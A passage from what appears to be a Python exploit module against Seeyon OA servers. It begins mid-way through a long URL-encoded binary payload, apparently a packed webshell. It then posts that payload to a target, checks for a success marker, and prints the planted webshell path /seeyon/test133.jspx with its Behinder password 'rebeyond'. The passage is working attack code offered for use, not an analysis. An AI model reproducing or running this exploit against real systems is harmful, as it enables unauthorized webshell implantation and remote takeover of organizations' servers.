B3%16%2B%11%C3%80%C3%A8%0A%C3%85%0A%C3%81%C2%99p%C2%80%C3%8BU%C3%AAb%C3%A0%3B76%C2%B4%0F%C3%BB%C2%81%7D%C3%98%C2%90%C2%ADa%23%2B%C3%92%C3%8F%C3%9B%C2%834%C2%B0Bi%048%C3%BD%C3%96%C3%94+%14%C2%AE%C3%90T%0D%C3%8B%C2%A8%06%C2%B6%C3%A6%C2%87P%C2%932%C2%87%C2%9CG%7B%0E%5D%C2%9D6%C3%86%C3%B1%1B%C2%BD%C3%86%10%C3%819%C2%A2uU%03%17%2BH%C2%9E%C2%AE%26%C2%AA%C2%BE%09%C3%A5C%1E%C2%ADi%0C%C2%8E%C2%B9O6aU%C3%98%26%C3%B0%C2%8F%C2%9C%1E%C3%95%C2%B1j%C2%9C.%1C%C3%B9%09%C2%B2%C2%88%C2%9F%7C%C3%B83%C2%B6%7F%C3%BD3%C2%95%C2%89%14%C3%8AZ%23%C2%9F%C3%96%C3%B9%02%C3%84O%C3%97o%C3%B8%C3%9Ay%C3%A4b%C2%9D%C2%A7%C3%B5I%C2%A0%18%C2%A4%C2%804zm%7Dj%C2%BD%C3%86%C2%AF_k%23O%C3%8FT%0E%12%C2%8B%08g%C2%97%C2%B5i%3E%16%C2%99%2C%0A%08%C2%92%C3%89%0D%1A%C3%83%C3%825%C3%90%C2%8D%C2%BEM%C3%B7%C2%BA%C2%B2P%22uN%C3%B3Z%C3%9E%C3%AD%C2%8A%C2%A6%3F8%15%C3%ADc%1D%C3%9B%C2%B4W%C3%A5%C3%A5%0A%01SG%C2%80%C3%9F%176%C2%A7%C2%B3G%C2%AC%C2%BF%C3%BDQ%C2%80%C2%9A%C2%A6s%C3%AB%C3%A2cB%C3%BDLi%0C4%7E%C2%B8rc%C2%85%C2%B5%0C%21%C2%A2%C3%B1Q%3F%C3%B4%0A%1A%C2%8B%0C%C2%90%C2%A0%C3%A9%C3%A9%3D7.%C2%A0%C2%A8%0F%21%C2%AD%C3%ADn%3Anz%12p%0Aq%C3%8C%09%C3%AB%C2%8A%3A%C2%BB%C2%8B%C2%AEe%5B%C3%97U%C3%A9%C3%B2%C3%BB%C3%87%C3%B79g%C2%B2%22%C3%AE%C3%A30%03%C3%BD%C3%89%C2%8B6%C3%BF6%C2%9Cy+%C2%81t%C3%94%C3%A1%C3%BDn%C2%A7%C3%BCs%C2%A5%C3%9E%7F%C2%A7%C2%BA5%C2%BB3%C2%ADm%C3%8B%C3%B4%C3%AE%C2%80%C3%BD%C3%B6%C2%9E%14%C2%A7%13%05h%C2%96%C3%80%C3%83%C2%97%C3%8E%C3%B1%C2%B0%C3%B8%C3%BA%C3%BCqI%7C%C3%9C4%C3%BD%C2%86Aq%C3%AF%23%C3%B8%C3%BF%C3%A9%02%C2%94d%1Eu%C3%AC%C3%87%C3%B7z%C3%BFP%02z%27%26%C3%8B%C2%9D%3C%04LUU%C2%BD%C2%87%C3%97%C3%AE%0F%C2%BA%1E%C3%A9%C2%8A%7C%C2%AD%C3%AF%C3%BCRx%C3%9D%C2%BF%C3%BF%05%C3%8E%C3%96%C2%AC%C2%8FY%05%00%00" 30 | r=core.post(url,path,header,data) 31 | if r.status_code==500 and '"message":null' in r.text: 32 | print('\033[32m[#]成功写入webshell\033[0m') 33 | core.end_echo(name,'webshell地址:'+url+'/seeyon/test133.jspx'+'\n'+'\033[32m[#]冰蝎密码:rebeyond\033[0m') 34 | core.result(name,url+'/seeyon/test133.jspx','rebeyond') 35 | 36 | else: 37 | print('\033[32m[#]写入webshell失败\033[0m') 38 | core.end_echo(name) 39 | --------------------------------------------------------------------------------